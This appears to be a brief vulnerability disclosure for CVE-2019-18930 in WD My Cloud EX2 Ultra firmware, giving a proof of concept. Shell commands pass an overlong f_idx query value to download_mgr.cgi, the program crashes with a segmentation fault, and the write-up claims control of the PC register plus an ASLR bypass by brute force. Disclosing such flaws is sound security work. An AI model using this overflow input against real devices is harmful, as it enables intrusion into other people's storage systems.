CVE-2019-18930
Information
Target : WD My Cloud EX2 Ultra
Version : 2.31.183, 2.31.195
Proof of Concept
root@MyCloudEX2Ultra cgi-bin # export REQUEST_METHOD=GET
root@MyCloudEX2Ultra cgi-bin # export QUERY_STRING=cmd=Downloads_Schedule_Info\&f_idx=`python -c 'print "a"*0x1f3 + "bbbb"'`
root@MyCloudEX2Ultra cgi-bin # ./download_mgr.cgi
I/O warning : failed to load external entity "/mnt/HD_a4/.systemfile/schedcfgs/aaaaaa (etc.) aaaaabbbb.xml"
Segmentation fault
Exploit
It is possible to control the PC register and bypass ASLR by doing brute force attack.